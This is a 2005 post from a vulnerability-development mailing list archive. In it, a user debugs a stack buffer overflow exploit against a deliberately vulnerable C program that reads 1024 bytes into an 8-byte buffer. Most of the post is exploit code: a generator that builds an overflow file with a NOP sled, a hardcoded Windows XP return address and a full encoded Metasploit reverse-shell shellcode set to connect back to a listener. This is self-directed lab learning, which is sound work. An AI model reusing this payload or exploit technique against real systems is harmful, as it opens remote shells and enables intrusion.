Vulnerability Development mailing list archives
problem to exploit a stack overflow
From: migalo digalo <l.epsilon () gmail com>
Date: Sun, 22 May 2005 18:20:35 +0000
hi all, first post :-D ok,ok i am trying to exploit an example of stack overflow vunerable prog: [code]#include <stdlib.h> #include <stdio.h> int bof() { char buffer[8]; FILE *badfile=NULL; badfile=fopen( "badfile", "r" ); if(badfile) printf("[+]file open\n"); fread( buffer, sizeof( char ), 1024, badfile );//danger return 1; } int main(int argc, char **argv) { bof(); printf("[-] nop nop!\n"); return 1; }[/code] so if i am right to exploit this we have the folwing stack :<NOPS><EBP><EIP><ESP> EBP==buffer[8] EIP==buffer[12] ESP==buffer[16] so i code this: [code] #include<stdio.h> #include<string.h> #include<windows.h> #include <process.h> #define RET_ADDRESS 0x7C951EED // The new return address for WinXP sp2 french ==jump esp /* win32_reverse - EXITFUNC=seh LHOST=127.0.0.1 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char shellcode[] = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12" "\xd4\x56\x85\x83\xeb\xfc\xe2\xf4\xee\xbe\xbd\xc8\xfa\x2d\xa9\x7a" "\xed\xb4\xdd\xe9\x36\xf0\xdd\xc0\x2e\x5f\x2a\x80\x6a\xd5\xb9\x0e" "\x5d\xcc\xdd\xda\x32\xd5\xbd\xcc\x99\xe0\xdd\x84\xfc\xe5\x96\x1c" "\xbe\x50\x96\xf1\x15\x15\x9c\x88\x13\x16\xbd\x71\x29\x80\x72\xad" "\x67\x31\xdd\xda\x36\xd5\xbd\xe3\x99\xd8\x1d\x0e\x4d\xc8\x57\x6e" "\x11\xf8\xdd\x0c\x7e\xf0\x4a\xe4\xd1\xe5\x8d\xe1\x99\x97\x66\x0e" "\x52\xd8\xdd\xf5\x0e\x79\xdd\xc5\x1a\x8a\x3e\x0b\x5c\xda\xba\xd5" "\xed\x02\x30\xd6\x74\xbc\x65\xb7\x7a\xa3\x25\xb7\x4d\x80\xa9\x55" "\x7a\x1f\xbb\x79\x29\x84\xa9\x53\x4d\x5d\xb3\xe3\x93\x39\x5e\x87" "\x47\xbe\x54\x7a\xc2\xbc\x8f\x8c\xe7\x79\x01\x7a\xc4\x87\x05\xd6" "\x41\x87\x15\xd6\x51\x87\xa9\x55\x74\xbc\x45\x0d\x74\x87\xdf\x64" "\x87\xbc\xf2\x9f\x62\x13\x01\x7a\xc4\xbe\x46\xd4\x47\x2b\x86\xed" "\xb6\x79\x78\x6c\x45\x2b\x80\xd6\x47\x2b\x86\xed\xf7\x9d\xd0\xcc" "\x45\x2b\x80\xd5\x46\x80\x03\x7a\xc2\x47\x3e\x62\x6b\x12\x2f\xd2" "\xed\x02\x03\x7a\xc2\xb2\x3c\xe1\x74\xbc\x35\xe8\x9b\x31\x3c\xd5" "\x4b\xfd\x9a\x0c\xf5\xbe\x12\x0c\xf0\xe5\x96\x76\xb8\x2a\x14\xa8" "\xec\x96\x7a\x16\x9f\xae\x6e\x2e\xb9\x7f\x3e\xf7\xec\x67\x40\x7a" "\x67\x90\xa9\x53\x49\x83\x04\xd4\x43\x85\x3c\x84\x43\x85\x03\xd4" "\xed\x04\x3e\x28\xcb\xd1\x98\xd6\xed\x02\x3c\x7a\xed\xe3\xa9\x55" "\x99\x83\xaa\x06\xd6\xb0\xa9\x53\x40\x2b\x86\xed\xe2\x5e\x52\xda" "\x41\x2b\x80\x7a\xc2\xd4\x56\x85"; int main(int argc,char *argv[]){ unsigned long addr; char buf[1024]; FILE * badfile; memset(buf,0x90,1024); *(unsigned long *)&buf[12] = RET_ADDRESS;//EIP=Return Address memcpy(&buf[16],shellcode,sizeof(shellcode)-1); badfile = fopen("badfile","wb"); fwrite(buf,1020,1,badfile); fclose(badfile); return 0x0; }[/code] but it doesn't work, :-( :no ,any help i am stuck with this for 8 hrs. in fact it work till the execution of the shellcode ,precisely the decode stage,so we get [+] eip <= RET_ADDRESS [+] jump esp [+] begin the shellcode execution [-] acces violation,in the decode stage:-x and what is worse is that i get the same prob with all the shellcode i used (all from metasploit),i am certain the are samething i missed ,cuz i have already used those shellcodes and they work perfect. any help
Current thread:
- problem to exploit a stack overflow migalo digalo (May 23)
- Re: problem to exploit a stack overflow Valdis . Kletnieks (May 25)
- <Possible follow-ups>
- problem to exploit a stack overflow migalo digalo (May 25)
- Re: problem to exploit a stack overflow Daniele Milan (May 25)
- Re: problem to exploit a stack overflow 6d79676d61696c6163636f756e74 (May 25)